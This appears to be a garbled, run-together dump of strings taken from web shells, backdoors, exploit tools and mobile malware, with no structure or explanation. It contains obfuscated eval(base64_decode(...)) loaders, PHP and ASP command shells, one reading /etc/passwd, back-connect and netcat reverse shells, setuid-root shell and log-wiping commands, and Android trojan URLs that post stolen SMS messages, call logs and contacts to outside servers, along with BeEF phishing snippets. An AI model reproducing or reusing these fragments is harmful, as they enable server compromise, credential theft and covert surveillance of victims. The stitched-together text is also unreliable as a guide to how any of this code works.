mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win 
dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... 
a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! 
(maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. 
php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . 
\"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. 
we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? 
$cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? 
1 previous command: set injection processes (status=0x%x)secondary injection process is <null> [no secondary process will be used]enter the address to be used as the spoofed ip source address (xxx.xxx.xxx.xxx) -> e: execute a command on the implantfullthreaddump.classthreadmonitor.classdeadlock$deadlockthread.class*
1 virtualprotectexinvalid parameterwinsta0\\defaultexplorer.execreateprocessasuserahttpendrequestagetmodulebasenameagetmodulefilenameexaenumprocessesspsssqproxy-authorization:basic kpstorecreateinstancefeb 04 2015i can not start %sdwconnectportdwremotelanportstrremotelanaddressstrlocalconnectip\
1 ati.jo840112-cras8468-11150923-pci8273vprincpespr!ncpeshastati\\temp\\~v3.logbrowser password recovery reportbrowserpassworddecryptorwww.securityxploded.comc:\\users\\bernardino\\appdata\\roaming\\berna@consultoreslegales.com.mx (1).pstmail password recovery reportmailpassworddecryptorc:\\users\\apant\\documents\\programdata\\abacus.ostc
1 c:\\documents and settings\\administrator\\got wmi process pid: %dthis exploit will executerunning reverse shell<description>chken qq:41901298</description>version=\"9.9.9.9\"name=\"ch.ken.tool\"to host!ss.exelstrlen0rtlunwnc -l -p port [options] [hostname] [port]invalid connection to [%s] from %s [%s] %dpost-rcv getsockname failedfailed to execute shell, error = %sudp listen needs -p arghttp://www.site.com/test.dll?user=%username&pass=%passwordusername: \"%s\", password: \"%s\", remarks: \"%s\"user:\"%s\" pass: \"%s\" result=\"%s\"mozilla/4.0 (compatible; msie 4.01; windows nt)l
1 downloadfile - exception:%s,code:0x%08x.mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)cdllapp::initinstance() - evnet already exists../emptycriss <target ip>cut and paste the following to the telnet prompt:environ define ttyprompt abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$interface, scriptedcannot read $opetc/scripme.override -- are you root?$env{exploit_scripme}the encryption key is ___tempfile2.outunless the -c (clobber) option is used, if two retr commands of themywarn(\"end of $destfile determined by \\\"^connection closed by foreign host\\\"\")end of $destfile determined by \"^connection closed by foreign host> /var/log/audit/audit.log; rm -f .pastables to run on target:cp /var/log/audit/audit.log .tmphere is the first good cron session fromno need to clean login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. 
exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum [-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: $0 -uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 
(compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. 
assuming 22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . 
\"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
1 banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdstart_serviceextra_key_smsandroid.provider.telephony.sms_receivedmphonenumbercnlybnq.qrk" // encrypted string "payload.dexcardholder nameinstagram.phpupd.php?text=android.app.action.add_device_admintap activate to continue with software update/upload-pictures.php?opened dialog:com/connect/myserviceandroid/os/binderandroid/app/servicedroidiandroidianserviceservicereceiverdendroidlastgamefile:///android_asset/enablecheatshttp://112.74.111.42:8000sha1-digest: oix4iywettkib4fbh7hconehuae=onlinegameprocedure_which_wap_idhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogsha1-digest: +rsrtx5snjstrnt7pnaeqazy4kc=sha1-digest: rt2orts0wwtjffgletgffix1dfe=http://image.baidu.com/wisebrowse/index?tag1=%e6%98%8e%e6%98%9f&tag2=%e5%a5%b3%e6%98%8e%e6%98%9f&tag3=%e5%85%a8%e9%83%a8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022d4notlefttriangleequal=022ecsha1-digest: x27zpw9c6eyxvefuzfcl2lmumti=_znst12_vector_baseisssaissee13_m_deallocateepssjfbtp2ahr3wkc6leyon7d5gzxvismj4qulibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizandroidmanifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? 
and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_domain6589y459zactivitylcom/android/zics/zruntimeinterfacemigfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqc/jvgb0/jsrwi7i4j9iwo72kzw404kj02a97exbuefvee7yywstbkw5sylkxctaoqwwr19j0y+xb6+h2brunx307bv/qpg6dnpg+lx8fppvhbhoudgkb/xuzpaz/gjbtpwztbbmt+mi1qtrlyakdxsjgwyvopfvz82rxcablv/twidaqabmiiceaibadanbgkqhkig9w0baqefaascamiwggjeageaaogbal8m+bvt+njfalulgn0ja7vypndjtisptyd3stftr59v4tvljzjnsrdmxiupck1qhdbavx2prj7fvr6hyfg43hftsfx9ckbooc+d4vhx88++fue652apv9e5k9rp8yltondnnsgzp6yjvbneviaopfkmzzi+g8vxpzzhfwbuvx+3agmbaaecgyblyr6uoquapozqjtvia5bpx0ijej+ygybzh1qs3z9e4itz42rpkwjkchds6eia2kpolznqbbmrv4e8ut3ufcvufexjr5clgvkj+xhxxqs75+kt38wgzz1bw0pk4st1/aglrt5/netwuzmi/yfnfakrpqvrxuncxnlhmhs2eflkiqjbapgea2uxvwd0ti8cla8hiwpsncptcp41dh2h0yczrfmo2zafppjih2gqy5txszwblbjxfcy8/whryaqx0itmrgscqqdkh5u1nfprvk0hu8ibrb/lpygimz+wm/chfsc65sls/cml3u7huoj2lrgpz+bm68624h0klviqpbjpmayvbbyfakea1nnfj9uax8rdn1b3ecjpmvqqimdjwyvcnjjq7/wnj6nu3+0toxc0xrsheigtbhrfsnrxc6kfuv3budbhvwog9wjbai+frh1ekowlaqviundw6ycndwhedhysz0tdodlhp112ieign06dpsgyjsmqurntb92cjsnw82c3r2nhmicxr60cqqcn466jf9gjrzipo64oyw/elmac7vxgtegmvyz2/yfx5crclua4dygd1ju0emxpea9og/etwctv0rvpfc9ssn8vhhheeeeeebbbbbb??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,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device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 
73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo 
camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 